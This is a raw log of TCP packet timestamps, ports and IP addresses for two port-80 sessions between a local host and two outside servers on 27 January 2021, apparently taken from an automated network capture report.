Jan 27, 2021 19:29:36.699095011 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.705379009 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.705431938 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.705543995 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.706127882 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.706165075 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.706197023 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.706222057 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.709233046 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.709260941 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.709731102 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.709803104 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.709896088 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.712995052 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.713104963 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.713483095 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.713516951 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.713555098 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.713624001 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.714524031 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.714576960 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.714777946 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.714823961 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.717056990 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.717132092 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.718003035 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.718053102 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.720752001 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.720819950 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.721360922 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.721417904 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.723624945 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.723653078 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.723680019 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.723692894 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.724246979 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.724280119 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.724293947 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.724325895 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.725178957 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.725208998 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.725235939 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.725245953 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.726166964 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.726191044 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.726218939 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.726232052 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.727330923 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.727385998 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.727391958 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.727432966 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.727870941 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.727893114 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.727952003 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.728868961 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.728897095 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.728925943 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.728936911 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.729664087 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.729715109 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.729722023 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.729760885 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.730521917 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.730547905 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.730578899 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.731489897 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.731513977 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.731523991 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.731540918 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.731548071 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.732275963 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.732317924 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.732321978 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.732355118 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.733319044 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.733350039 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.733362913 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.733392954 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.734210014 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.734265089 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.734276056 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.734322071 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.735074043 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.735110998 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.735136986 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.735148907 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.736599922 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.736620903 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.736651897 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.736663103 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.737282038 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.737306118 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.737332106 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.737344027 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.737595081 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.737628937 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.737715006 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.737750053 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.738377094 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.738416910 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.738432884 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.738473892 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.739288092 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.739329100 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.739342928 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.739379883 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.740084887 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.740112066 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.740123987 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.740149021 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.741012096 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.741038084 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.741064072 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.741854906 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.741875887 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.741909027 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.741926908 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.742863894 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.742882967 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.742925882 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:37.040647984 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:37.679514885 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.728903055 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.729046106 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.731040955 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.780169010 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.780224085 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.780278921 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.780320883 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.780329943 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.780371904 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.780411959 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.780419111 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.780442953 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.780481100 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.780489922 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.780529022 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.780544043 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.780571938 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.780628920 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.827893972 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.827977896 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.828032017 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.828073025 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.828094006 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.828111887 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.828150034 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.828172922 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.828188896 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.828227043 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.828228951 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.828274965 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.828318119 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.828318119 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.828353882 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.828373909 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.828391075 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.828428984 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.828459978 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.828464985 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.828502893 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.828528881 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.828540087 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.828587055 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.828602076 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.828628063 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.828664064 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.828690052 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.828701973 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.828769922 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.875758886 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.875814915 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.875864983 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.875909090 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.875946045 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.875984907 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876025915 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876063108 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876064062 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.876096010 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.876101971 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.876101971 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876122952 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.876138926 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876184940 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876203060 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.876226902 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876264095 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876302004 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876341105 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876377106 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876378059 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.876389027 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.876414061 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876441956 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.876451969 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876498938 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876513958 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.876542091 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876578093 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876597881 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.876616001 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876652956 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876672983 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.876688004 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876724958 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876749992 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.876760006 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876806974 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876821995 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.876847982 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876883984 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876904011 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.876920938 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876957893 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.876976013 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.876993895 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.877032995 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.877070904 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.877084017 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.877118111 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.877135038 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.877159119 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.877194881 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.877219915 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.877232075 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.877269030 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.877289057 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.877305031 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.877361059 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.924599886 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.924655914 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.924686909 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.924724102 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.924772024 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.924813986 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.924851894 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.924890995 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.924915075 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.924927950 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.924947977 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.924953938 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.924966097 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925004959 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925024033 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.925045967 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925091982 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925093889 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.925134897 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925170898 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925182104 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.925210953 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925247908 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925256014 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.925285101 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925322056 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925331116 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.925359011 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925422907 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.925446033 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925496101 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925537109 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925550938 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.925574064 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925611973 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925635099 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.925647974 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925683975 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925698996 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.925723076 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925760984 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925767899 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.925807953 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925848961 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925853014 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.925884962 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925921917 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925929070 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.925960064 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.925997019 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.926013947 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.926038980 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.926075935 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.926086903 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.926122904 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.926163912 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.926167965 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.926201105 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.926238060 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.926244974 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.926275969 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.926311970 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.926320076 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.926348925 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.926386118 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.926392078 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.926433086 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.926474094 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.926480055 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.926510096 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.926558018 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.973736048 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.973805904 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.973834038 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.973864079 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.973901987 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.973938942 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.973975897 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974013090 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974065065 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974107981 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974118948 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.974144936 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974148989 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.974154949 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.974184990 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974221945 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974258900 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974268913 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.974297047 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974320889 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.974330902 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974379063 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974409103 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.974420071 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974457026 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974494934 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.974498034 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974534988 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974558115 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.974570036 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974606991 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974642038 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974642992 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.974689007 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974708080 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.974730968 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974766970 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:37.974800110 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:37.974803925 CET	80	49168	193.239.147.103	192.168.2.22
